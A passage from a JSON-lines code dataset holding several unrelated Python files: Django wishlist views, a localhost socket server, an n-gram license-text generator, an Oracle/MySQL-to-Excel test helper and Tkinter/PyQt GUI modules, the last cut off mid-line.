= res[1]\n\t\treturn redirect('/success')\n\n\tfor error in res[0]:\n\t\tmessages.warning(request, error)\n\treturn redirect('/')\n\ndef success(request):\n\tif request.session.get('id'):\n\t\tuserWishlistIds =[]\n\t\tuserInfo = models.User.objects.filter(id = request.session['id'])\n\t\tuserWishlist = models.Wishlist.objects.all().filter(user__id = userInfo)\n\t\tfor ids in userWishlist:\n\t\t\tuserWishlistIds.append(ids.item.id)\n\t\titems = models.Item.objects.all().exclude(id__in = userWishlistIds)\n\t\tdata = {\"user\":userInfo[0], \"userWishlist\": userWishlist, \"items\":items}\n\t\treturn render(request, \"mainProjectApp/success.html\", data)\n\treturn redirect('/')\n\ndef add_item(request):\n\tif request.session.get('id'):\n\t\treturn render(request, 'mainProjectApp/add_item.html')\n\treturn redirect('/')\n\ndef add_item_db(request):\n\tresponse = models.Item.objects.add_item_to_db(request.POST, request.session['id'])\n\tif not response:\n\t\tmessages.success(request, \"You have successfully added an item!\")\n\t\treturn redirect('/success')\n\telse:\n\t\tfor error in response:\n\t\t\tmessages.warning(request, error)\n\t\treturn redirect('/add_item')\n\ndef add_to_wishlist(request, id):\n\titem = models.Wishlist.objects.add_to_wishlist(id, request.session['id'])\n\treturn redirect('/success')\n\ndef item_page(request, id):\n\tif 
request.session.get('id'):\n\t\tusers = models.Wishlist.objects.filter(item__id = id)\n\t\tdata = {\"users\":users, \"item\":users[0].item}\n\t\treturn render(request, 'mainProjectApp/item_page.html', data)\n\treturn redirect('/')\n\n\ndef remove_wishlist(request, id):\n\tmodels.Wishlist.objects.filter(item__id = id, user__id = request.session['id']).delete()\n\treturn redirect('/success')\n\n\ndef delete(request, id):\n\tmodels.Wishlist.objects.filter(item__id= id).delete()\n\tmodels.Item.objects.filter(id= id).delete()\n\treturn redirect('/success')\n\ndef logout(request):\n\trequest.session.clear()\n\treturn redirect('/')","sub_path":"apps/mainProjectApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"23036140","text":"import socket\nimport threading\n\nHOST = '127.0.0.1' # The server's hostname or IP address\nPORT = 4646 # The port used by the server\n\n\n\ntry:\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST,PORT))\n s.setblocking(True)\n print('server 3 up')\n s.listen()\n while True:\n conn,addr=s.accept()\n with conn:\n print('Connected to ',addr)\n data = conn.recv(1024)\n num = int(data.decode())\n aux =num\n print(data.decode())\n for i in range(39):\n aux=aux*num\n print(str(num)+' raised to the power '+str(i+2)+' = '+str(aux))\n conn.sendall(str(aux).encode())\n s.close()\n\n\nexcept KeyboardInterrupt:\n print('interrupted')","sub_path":"Redes_2/Practica_Seis/Server_3.py","file_name":"Server_3.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"205316067","text":"import ast\r\nimport os\r\nimport string\r\nimport re\r\nimport glob\r\nimport random\r\nfrom pathlib import Path\r\nimport pandas as pd\r\nfrom collections import defaultdict\r\nfrom typing import List\r\nimport intxeger\r\nimport multiprocessing\r\nimport time\r\nimport itertools\r\nimport numpy as np\r\n\r\n\r\ndef main(dictionary,spdxregex,ltregex):\r\n for key in dictionary:\r\n if dictionary[key]==\"\":\r\n continue\r\n \r\n content = dictionary[key]\r\n \r\n para = sum(line.isspace() for line in content) + 1\r\n contents = content.split('\\n\\n')\r\n text = \". 
\".join(contents)\r\n text = clean_license(text)\r\n reg1 = spdxregex.loc[spdxregex['Licenses'].str.contains(key.split('-').pop(0)),'Regex'].values.tolist()\r\n reg2 = ltregex.loc[ltregex['Licenses'].str.contains(key.split('-').pop(0)),'Regex'].values.tolist()\r\n ab = itertools.chain(reg1,reg2)\r\n regex = list(ab)\r\n regex_list = []\r\n rep = {\"=FEW=\": \".{1,32}\", \"=SOME=\": \".{1,60}\", \"=ANY=\": \".{1,60}\"} \r\n rep = dict((re.escape(k), v) for k, v in rep.items()) \r\n pattern = re.compile(\"|\".join(rep.keys()))\r\n for r in regex:\r\n r = pattern.sub(lambda m: rep[re.escape(m.group(0))], r)\r\n regex_list.append(r)\r\n\r\n regex_list = list(filter(None, regex_list))\r\n\r\n if len(regex_list)==0:\r\n continue\r\n for reg in regex_list:\r\n reg = reg.strip().replace('\"', '')\r\n expansion = []\r\n if \"(.{1,32} (AND|OR)){1,4}\" in reg:\r\n prevsen = reg.split(\"(.{1,32} (AND|OR)){1,4}\")[0]\r\n latersen = reg.split(\"(.{1,32} (AND|OR)){1,4}\")[-1] \r\n for i in range(2,8):\r\n m = create_ngram_model(i,key)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,32))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n elif \".{1,32}\" in reg:\r\n prevsen = reg.split(\".{1,32}\")[0]\r\n latersen = reg.split(\".{1,32}\")[-1]\r\n for i in range(2,8):\r\n m = create_ngram_model(i,text)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,32))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n elif \".{1,60}\" in reg:\r\n prevsen = reg.split(\"(.{1,60}\")[0]\r\n latersen = reg.split(\"(.{1,60}\")[-1]\r\n for i in range(2,8):\r\n m = create_ngram_model(i,text)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(12,60))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n else:\r\n expansion_ = []\r\n expansion_ = licensestatement_(reg)\r\n \r\n filegen = 0\r\n for i in range(para):\r\n try:\r\n part = str(contents[i])\r\n for ind in range(len(expansion_)):\r\n filegen+=1 \r\n with open(os.path.join('C:/Users/Documents/GSOC21/db','{}-{}.txt'.format(key,filegen)), 'w') as o1:\r\n o1.write(part+\" \"+expansion_[ind])\r\n except:\r\n break\r\n \r\ndef clean_license(text):\r\n license = text\r\n license = re.sub(r'\\w*\\d\\w*', '', license)\r\n license = re.sub(\"[\\n]+\", \"\\n\",license)\r\n license = license.strip()\r\n punctuationNoPeriod = \"[\" + \"(\" + \")\" + \"]\"\r\n license = re.sub(punctuationNoPeriod, \"\", license)\r\n license = license.translate(str.maketrans('', '', string.punctuation))\r\n license = re.sub(r\"\\b[a-zA-Z]\\b\", \"\", license)\r\n license = re.sub(\"[\\s]+\", \" \",license)\r\n license = license.replace('\"', '') \r\n return license\r\n\r\ndef licensestatement_(regex_):\r\n x = intxeger.build(regex_)\r\n res=x.sample(N=1)\r\n result = res\r\n i=2\r\n while True:\r\n try:\r\n result = res\r\n result = list(set(result))\r\n if len(result) >10:\r\n return result 
\r\n res = x.sample(N=i)\r\n i+=1\r\n except: \r\n break\r\n return result\r\n\r\ndef regex_expansion(prevsen,input_list,latersen):\r\n res_=[]\r\n while(len(res_)<200):\r\n final_regex = \"\"\r\n num = random.randint(1,4)\r\n for i in range(num):\r\n final_regex = final_regex + np.random.choice(input_list)+\" (and|or) \"\r\n fregex_ = prevsen + \" \" + final_regex + \" \" + latersen\r\n ans = licensestatement_(fregex_)\r\n for i in ans:\r\n i = re.sub(\"[\\s]+\", \" \",i)\r\n res_.append(i)\r\n return res_\r\n\r\ndef generate_statements():\r\n for i in range(2,20):\r\n m = create_ngram_model(i,text)\r\n \r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,31))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n\r\ndef tokenize(text: str) -> List[str]:\r\n for punct in string.punctuation:\r\n text = text.replace(punct, ' '+punct+' ')\r\n t = text.split()\r\n return t\r\n\r\ndef get_ngrams(n: int, tokens: list) -> list:\r\n tokens = (n-1)*['']+tokens\r\n l = [(tuple([tokens[i-p-1] for p in reversed(range(n-1))]), tokens[i]) for i in range(n-1, len(tokens))]\r\n return l\r\n\r\n\r\nclass NgramModel(object):\r\n\r\n def __init__(self, n):\r\n self.n = n\r\n self.context = {}\r\n self.ngram_counter = {}\r\n\r\n def update(self, sentence: str) -> None:\r\n n = self.n\r\n ngrams = get_ngrams(n, tokenize(sentence))\r\n for ngram in ngrams:\r\n if ngram in self.ngram_counter:\r\n self.ngram_counter[ngram] += 1.0\r\n else:\r\n self.ngram_counter[ngram] = 1.0\r\n\r\n prev_words, target_word = ngram\r\n if prev_words in self.context:\r\n self.context[prev_words].append(target_word)\r\n else:\r\n self.context[prev_words] = [target_word]\r\n\r\n def prob(self, context, token):\r\n try:\r\n count_of_token = self.ngram_counter[(context, token)]\r\n count_of_context = float(len(self.context[context]))\r\n result = count_of_token / count_of_context\r\n\r\n except KeyError:\r\n result = 0.0\r\n return result\r\n\r\n def random_token(self, context):\r\n r = random.random()\r\n map_to_probs = {}\r\n token_of_interest = self.context[context]\r\n for token in token_of_interest:\r\n map_to_probs[token] = self.prob(context, token)\r\n\r\n summ = 0\r\n for token in sorted(map_to_probs):\r\n summ += map_to_probs[token]\r\n if summ > r:\r\n return token\r\n\r\n def generate_text(self, token_count: int):\r\n n = self.n\r\n context_queue = (n - 1) * ['']\r\n result = []\r\n for _ in range(token_count):\r\n obj = self.random_token(tuple(context_queue))\r\n result.append(obj)\r\n if n > 1:\r\n context_queue.pop(0)\r\n if obj == '.':\r\n context_queue = (n - 1) * ['']\r\n else:\r\n context_queue.append(obj)\r\n return ' '.join(result)\r\n\r\n\r\ndef create_ngram_model(n, text):\r\n m = NgramModel(n)\r\n for sentence in text:\r\n sentence += '.'\r\n m.update(sentence)\r\n return m\r\n\r\nif __name__ == \"__main__\":\r\n with open(\"C:/Users/Documents/GSOC21/extract_header_text/database_licenses.txt\", \"r\") as data:\r\n dictionary = ast.literal_eval(data.read())\r\n\r\n spdxregex = pd.read_csv(\"C:/Users/Documents/Downloads/SPDX_regex.csv\")\r\n ltregex = pd.read_csv(\"C:/Users/Documents/GSOC21/validation_/LT_regex.csv\")\r\n res1 = dict(list(dictionary.items())[:len(dictionary)//3])\r\n res2 = dict(list(dictionary.items())[len(dictionary)//3:(2*len(dictionary)//3)])\r\n res3 = dict(list(dictionary.items())[(2*len(dictionary)//3):])\r\n\r\n 
list_data = [(res1,spdxregex,ltregex),(res2,spdxregex,ltregex),(res3,spdxregex,ltregex)]\r\n\r\n with multiprocessing.Pool(processes=3) as pool:\r\n pool.starmap(main,list_data)","sub_path":"dbgen.py","file_name":"dbgen.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198551924","text":"# coding:utf-8\n\n\"\"\"\n作者:azheng\n文件名:db.py\n最近修改:2018年12月26日\n文档描述:\n 编写一个方便访问数据库的类,支持访问Oracle和MySQL\n修改记录:\n 2019年1月25日:\n 1. 新增支持mysql数据库\n\n\"\"\"\n\n__author__ = \"zhangzheng\"\n\nimport os\nimport inspect\nfrom abc import ABC, abstractmethod\nfrom collections import OrderedDict\nfrom typing import Iterable, Union, List, Generator\nimport pyodbc\nimport pymysql\nfrom pymysql.cursors import DictCursor, SSCursor\nimport pandas\nfrom pandas import DataFrame, ExcelWriter\n\nfrom src.config.config import Config\nfrom src.exception.seleniumexecption import SeleniumTypeError\nfrom src.database.compare import Compare\n\n\nclass DataType(object):\n DictCursor = 1 # 元祖包含字典\n SSCursor = 2 # 列表包含元祖\n\n\nclass AbstracDBClass(ABC):\n @abstractmethod\n def __init__(self):\n \"\"\"\n 数据库初始化\n 需要读取对应数据的配置项\n \"\"\"\n\n @abstractmethod\n def _read_config(self):\n \"\"\"\n 数据库初始化前需要先读取配置\n \"\"\"\n\n @abstractmethod\n def _connect(self):\n \"\"\"\n 创建数据库连接\n \"\"\"\n\n @abstractmethod\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n if data_type == DataType.DictCursor:\n df = pandas.DataFrame(data)\n else:\n df = None\n return df\n\n @abstractmethod\n def _table_name(self, sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n :param sql: sql\n :return: 表名\n\n 注意:\n 暂不支持句式如下的sql语句\n SELECT *\n FROM (SELECT A.*,\n NVL((SELECT B.FULL_NAME\n FROM CLIENT B\n WHERE B.CLIENT_ID = A.CLIENT_ID),\n ' ') AS FULL_NAME\n FROM MONITORACCT A) A\n WHERE 1 = 1\n AND TRIM(A.FUND_ACCOUNT) IS NOT NULL\n AND A.VALID_FLAG = '1'\n AND A.IS_LIST_ACCT = '1'\n AND A.BEGIN_DATE < SYSDATE\n AND END_DATE > SYSDATE\n AND A.EXCHANGE_TYPE IN ('1', '2', 'D', 'H');\n\n \"\"\"\n _sql_split_list = str.upper(sql).split()\n _table_name_index = _sql_split_list.index(\"FROM\") + 1\n table_name = _sql_split_list[_table_name_index]\n return table_name.split(\".\")[-1].replace(\";\", \"\") # hs_user.sysarg; SYSARG\n\n @abstractmethod\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n \"\"\"\n 说明:\n 支持查询并返回指定数据类型的数据\n\n :param sql: sql\n :param data_type: 指定数据类型\n\n :return: 返回指定数据类型的数据\n \"\"\"\n # TODO: 需要支持多种数据返回类型\n if \"SELECT\" in str.upper(sql): # select查询\n cursor = self.connect.cursor()\n cursor.execute(sql)\n result_columns_gen = [str.upper(column[0]) for column in cursor.description] # 返回查询结果的列名\n result_rows_list = cursor.fetchall() # 返回查询数据\n # 处理不同种数据类型\n if data_type == DataType.DictCursor:\n result = (OrderedDict(zip(result_columns_gen, rows)) for rows in result_rows_list)\n elif data_type == DataType.SSCursor:\n result = result_rows_list\n else:\n result = []\n return result\n else:\n return None\n\n @abstractmethod\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 说明:\n 支持将查询数据写入文件\n 将dataframes存入Excel中\n\n :param dataframes: 由dataframe组成的可迭代对象\n :param excel_name: Excel文件路径名\n :param sheet_names: sheet页名\n :param index: 是否写入行号\n\n :return: Excel文件\n \"\"\"\n 
with ExcelWriter(excel_name) as writer:\n for i, df in enumerate(dataframes):\n if sheet_names:\n df.to_excel(writer, sheet_name=sheet_names[i], index=index)\n else:\n df.to_excel(writer, sheet_name=\"sheet\"+str(i), index=index)\n\n @abstractmethod\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 说明:\n 通过传入sql语句将数据落地为Excel文件,数据库中的一个表存到Excel为一个sheet页\n 示例:\n ==========================================\n (1):一次查询一个表并落地到Excel中t\n DB().expectation(sql=\"select * from hs_user.excharg;\")\n\n (2):一次查询多个表并落地到Excel中\n DB().expectation(\n sql=[\n \"select * from hs_user.excharg;\",\n \"select * from hs_user.sysarg;\"\n \"select * from hs_user.exchargtime;\"\n ]\n )\n ==========================================\n \"\"\"\n df_list = []\n table_name_list = []\n if isinstance(sql, str):\n _sql = sql\n table_name = self._table_name(sql=_sql)\n result = self.select(sql=_sql, data_type=data_type)\n df = self._data_convert_dataframe(data=result, data_type=data_type)\n df_list.append(df)\n table_name_list.append(table_name)\n elif isinstance(sql, Iterable):\n for _sql in sql:\n table_name = self._table_name(sql=_sql)\n result = self.select(sql=_sql, data_type=data_type)\n df = self._data_convert_dataframe(data=result, data_type=data_type)\n df_list.append(df)\n table_name_list.append(table_name)\n self.to_excel(dataframes=df_list,\n excel_name=excel_path,\n sheet_names=table_name_list)\n\n\nclass OracleDB(AbstracDBClass):\n \"\"\"\n Oracle数据库实例\n \"\"\"\n def __init__(self):\n self._read_config()\n self._connect()\n\n def _read_config(self):\n self.dsn = Config.DSN\n self.username = Config.userName\n self.password = Config.passWord\n\n def _connect(self):\n self.connect = pyodbc.connect(\"DSN=%s;UID=%s;PWD=%s;\" % (self.dsn, self.username, self.password))\n\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n return super()._data_convert_dataframe(data=data, data_type=data_type)\n\n def _columns(self,\n table=None,\n schema=None,\n column=None) -> Generator:\n \"\"\"\n 说明:\n 返回表字段相关信息\n :param table: 表名\n :param schema: 用户名\n :param column: 字段名\n :return: 表字段相关信息\n 0) table_cat\n 1) table_schem\n 2) table_name\n 3) column_name\n 4) data_type\n 5) type_name\n 6) column_size\n 7) buffer_length\n 8) decimal_digits\n 9) num_prec_radix\n 10) nullable\n 11) remarks\n 12) column_def\n 13) sql_data_type\n 14) sql_datetime_sub\n 15) char_octet_length\n 16) ordinal_position\n 17) is_nullable\n \"\"\"\n if table: table = str.upper(table)\n if schema: schema = str.upper(schema)\n if column: column = str.upper(column)\n cursor = self.connect.cursor()\n _columns_l = cursor.columns(table=table, schema=schema, column=column).fetchall()\n return ((row[3], row[5]) for row in _columns_l)\n\n def _table_name(self,\n sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n \"\"\"\n return super()._table_name(sql=sql)\n\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n \"\"\"\n 支持查询并返回指定数据类型的数据\n \"\"\"\n return super().select(sql=sql,\n data_type=data_type)\n\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 支持将查询数据写入文件\n \"\"\"\n return super().to_excel(dataframes=dataframes,\n excel_name=excel_name,\n sheet_names=sheet_names,\n index=index)\n\n def expectation(self,\n 
sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 支持客户使用该方法将期望查询sql落地成Excel文件\n \"\"\"\n return super().expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\nclass MySQLDB(AbstracDBClass):\n \"\"\"\n MySQL数据库实例\n \"\"\"\n def __init__(self):\n self._read_config()\n self._connect()\n\n def _read_config(self):\n self.host = Config.host\n self.user = Config.user\n self.passwd = Config.passwd\n self.port = Config.port\n self.charset = Config.charset\n\n def _connect(self):\n self.connect = pymysql.connect(host=self.host,\n user=self.user,\n password=self.passwd,\n port=self.port,\n charset=self.charset)\n\n def _table_name(self,\n sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n \"\"\"\n return super()._table_name(sql=sql)\n\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n return super().select(sql=sql, data_type=data_type)\n\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n return super()._data_convert_dataframe(data=data,\n data_type=data_type)\n\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 支持将查询数据写入文件\n \"\"\"\n return super().to_excel(dataframes=dataframes,\n excel_name=excel_name,\n sheet_names=sheet_names,\n index=index)\n\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 支持客户使用该方法将期望查询sql落地成Excel文件\n \"\"\"\n return super().expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\nclass DB(object):\n def __init__(self, dbtype=\"\"):\n self.db = self._read_config(dbtype=dbtype)\n\n def _read_config(self, dbtype: str):\n \"\"\"\n 先读取config目录下的配置文件,决定实例化哪种数据库类型,例如 Oracle or MySQL。\n :param args:\n :param kwargs:\n 1) dbtype: 数据库类型,当指定类型时优先根据指定类型实例化,否则读取config.ini配置\n 如果config.ini未配置默认为MySQL\n \"\"\"\n supported_dbtypes = {\"ORACLE\", \"MYSQL\"}\n _dbtype = str.upper(dbtype)\n _dbtype_config = str.upper(Config.dbtype)\n\n if _dbtype in supported_dbtypes:\n if _dbtype == \"ORACLE\":\n return OracleDB()\n elif _dbtype == \"MYSQL\":\n return MySQLDB()\n elif _dbtype and (_dbtype not in supported_dbtypes): # 指定dbtype但不在支持数据库范围内\n raise SeleniumTypeError(\"指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n elif _dbtype_config in supported_dbtypes:\n if _dbtype_config == \"ORACLE\":\n return OracleDB()\n elif _dbtype_config == \"MYSQL\":\n return MySQLDB()\n else: # 未指定dbtype且配置文件不在支持数据库范围内\n raise SeleniumTypeError(\"未指定数据库或指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n\n # def __new__(cls, *args, **kwargs):\n # \"\"\"\n # 先读取config目录下的配置文件,决定实例化哪种数据库类型,例如 Oracle or MySQL。\n # :param args:\n # :param kwargs:\n # 1) dbtype: 数据库类型,当指定类型时优先根据指定类型实例化,否则读取config.ini配置\n # 如果config.ini未配置默认为MySQL\n # \"\"\"\n # supported_dbtypes = {\"ORACLE\", \"MYSQL\"}\n # _dbtype = str.upper(kwargs.get('dbtype', \"\"))\n # _dbtype_config = str.upper(Config.dbtype)\n #\n # if _dbtype in supported_dbtypes:\n # if _dbtype == \"ORACLE\":\n # return OracleDB()\n # elif _dbtype == \"MYSQL\":\n # return MySQLDB()\n # elif _dbtype and (_dbtype not in supported_dbtypes): # 指定dbtype但不在支持数据库范围内\n # raise SeleniumTypeError(\"指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n # elif _dbtype_config in supported_dbtypes:\n # if _dbtype_config == \"ORACLE\":\n # 
return OracleDB()\n # elif _dbtype_config == \"MYSQL\":\n # return MySQLDB()\n # else: # 未指定dbtype且配置文件不在支持数据库范围内\n # raise SeleniumTypeError(\"未指定数据库或指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None):\n \"\"\"\n 说明:\n 通过传入sql语句将数据落地为Excel文件,数据库中的一个表存到Excel为一个sheet页\n \"\"\"\n if excel_path is None:\n excel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"【Test】_【实际结果】.xlsx\")\n self.db.expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\ndef test_dbcheck(sql: Union[str, Iterable[str]]):\n def decorator(func):\n co_varnames = tuple(inspect.signature(func).parameters) # 获取func函数的形参\n def warpper(*arg, **kwargs):\n func(*arg, **kwargs)\n _check_result = False\n try:\n IS_TEST_FUNC = (\"test\" in str(arg[0].__class__)) and (co_varnames[0] == \"self\")\n except IndexError:\n raise SeleniumTypeError(\"装饰器@test_dbcheck请使用在测试案例方法上 'def test_*(self, ): '。\")\n if IS_TEST_FUNC: # 表示第一个参数是对象测试用例方法“test_*”\n self = arg[0]\n _check_result = dbcheck(self=self, sql=sql)\n else:\n raise SeleniumTypeError(\"装饰器@test_dbcheck请使用在测试案例方法上 'def test_*(self, ): '。\")\n if not _check_result:\n self.assertEqual(\"\", sql, msg=\"数据比对失败,请查看比对结果文件\")\n return warpper\n return decorator\n\n\ndef dbcheck(self, sql: Union[str, Iterable[str]]) -> bool:\n \"\"\"\n 说明:\n 执行数据比对\n\n :param sql: 需要比对的sql语句\n\n :return: True or False \n \"\"\"\n except_path, actual_path = _get_compare_filename(self=self)\n except_exist = os.path.exists(except_path)\n if not except_exist:\n DB().expectation(sql=sql,\n excel_path=actual_path,)\n return False\n else: # 存在期望结果则开始比较\n DB().expectation(sql=sql,\n excel_path=actual_path,)\n return Compare(expected=except_path, actual=actual_path).compare()\n\n\ndef _get_compare_filename(self):\n _module = self.__module__\n _module = _module.replace(\".\", \"\\\\\")\n case_filename = os.path.realpath(_module + \".py\")\n _dir = os.path.dirname(case_filename) # case案例所在目录\n _name = ( \"[\"\n + self.__module__\n + \".\"\n + self.__class__.__name__\n + \".\"\n + self._testMethodName\n + \"]\")\n except_path = os.path.join(_dir, _name) + \"_[期望结果].xlsx\"\n actual_path = os.path.join(_dir, _name) + \"_[执行结果].xlsx\"\n return except_path, actual_path\n\n\nif __name__ == \"__main__\":\n df = DB().expectation(\n sql=[\n \"select * from hs_user.excharg;\",\n \"select * from hs_user.exchangetime;\",\n \"select * from hs_user.sysarg;\"\n ]\n )\n # DB().expectation(sql=\"select * from hs_user.exchangetime;\")\n","sub_path":"src/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":18652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352522508","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter import filedialog\nfrom main import *\nfrom PIL import ImageTk, Image\nimport os\nfrom time import sleep\n\n\n\n\ndef main():\n OPTIONS = [\n \"Wiley\",\n \"Europe PMC\",\n \"Science Direct\",\n \"Springer\"\n ]\n\n def begin(file,name,choice,first,last):\n craw(file,name,choice,first,last)\n\n root = Tk()\n root.config(height=300, width=600,background='white')\n root.resizable(width=False, height=False)\n root.title(\"Database crawling - URL\")\n\n img = ImageTk.PhotoImage(Image.open(\"bg1.jpg\"))\n panel = Label(root, image = img)\n panel.pack(side = \"top\", fill = \"both\", expand = \"yes\")\n\n group = LabelFrame(root, text=\"Input\", padx=5, pady=5)\n 
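Editor's note on the db.py record above: _get_compare_filename rebuilds the test module's directory with a hard-coded Windows separator (_module.replace(".", "\\\\")). A hedged, portable sketch using os.path; it keeps the original assumption that test modules are importable relative to the working directory, and compare_paths is a hypothetical name.

import os

def compare_paths(test_self):
    # Map package.module -> package/module.py without assuming a separator.
    module_file = os.path.join(*test_self.__module__.split('.')) + '.py'
    case_dir = os.path.dirname(os.path.realpath(module_file))
    name = '[%s.%s.%s]' % (test_self.__module__,
                           test_self.__class__.__name__,
                           test_self._testMethodName)
    return (os.path.join(case_dir, name + '_[期望结果].xlsx'),
            os.path.join(case_dir, name + '_[执行结果].xlsx'))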
group.pack(padx=10, pady=10)\n group.place(relx=0.5, rely=0.5, anchor=CENTER)\n\n choiceLabel = Label(group,text=\"Select database : \")\n choiceLabel.grid(row=0,column=0)\n\n variable = StringVar(group)\n variable.set(OPTIONS[0]) # default value\n w = OptionMenu(group, variable, *OPTIONS)\n w.grid(row=0,column=1)\n\n keyText = Label(group,text=\"Enter url :\")\n keyEntry = Entry(group)\n keyText.grid(row=1, sticky=E)\n keyEntry.grid(row=1, column=1)\n\n initNumText = Label(group, text=\"first page : \")\n initNumEntry = Entry(group)\n initNumText.grid(row=2, sticky=E)\n initNumEntry.grid(row=2, column=1)\n\n finalNumText = Label(group, text=\"last page : \")\n finalNumEntry = Entry(group)\n finalNumText.grid(row=3, sticky=E)\n finalNumEntry.grid(row=3, column=1)\n\n nameText = Label(group, text=\"Enter file name : \")\n nameEntry = Entry(group)\n nameText.grid(row=4, sticky=E)\n nameEntry.grid(row=4, column=1)\n\n\n\n MyButton = Button(group, text=\"Submit\", width=10,\n command=lambda:begin(keyEntry.get(),nameEntry.get(),variable.get(),initNumEntry.get(),finalNumEntry.get()))\n MyButton.grid(columnspan=2)\n\n root.mainloop()\n\nmain()\n","sub_path":"url crawler/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600335533","text":"import numpy as np\nfrom PyQt5 import QtWidgets, QtCore\nfrom sklearn.linear_model import LassoLars\n\nfrom point_spectra_gui.ui.cv_LassoLARS import Ui_Form\nfrom point_spectra_gui.util.Modules import Modules\n\n\nclass Ui_Form(Ui_Form, Modules):\n def setupUi(self, Form):\n super().setupUi(Form)\n self.checkMinAndMax()\n self.connectWidgets()\n\n def get_widget(self):\n return self.formGroupBox\n\n def setHidden(self, bool):\n self.get_widget().setHidden(bool)\n\n def connectWidgets(self):\n # LassoLARS\n ll = LassoLars()\n self.minalpha_spin.setDecimals(20)\n self.maxalpha_spin.setDecimals(20)\n\n self.minalpha_spin.setValue(0.0000001)\n self.maxalpha_spin.setValue(0.01)\n self.nalpha_spin.setValue(100)\n self.fit_intercept_list.setCurrentItem(\n self.fit_intercept_list.findItems(str(ll.fit_intercept), QtCore.Qt.MatchExactly)[0])\n self.normalize_list.setCurrentItem(self.normalize_list.findItems(str(ll.normalize), QtCore.Qt.MatchExactly)[0])\n self.max_iterLineEdit.setText(str(ll.max_iter))\n self.force_positive_list.setCurrentItem(\n self.force_positive_list.findItems(str(ll.positive), QtCore.Qt.MatchExactly)[0])\n\n def run(self):\n fit_intercept_items = [i.text() == 'True' for i in self.fit_intercept_list.selectedItems()]\n normalize_items = [i.text() == 'True' for i in self.normalize_list.selectedItems()]\n positive_items = [i.text() == 'True' for i in self.force_positive_list.selectedItems()]\n alphas = np.logspace(np.log10(self.minalpha_spin.value()), np.log10(self.maxalpha_spin.value()),\n 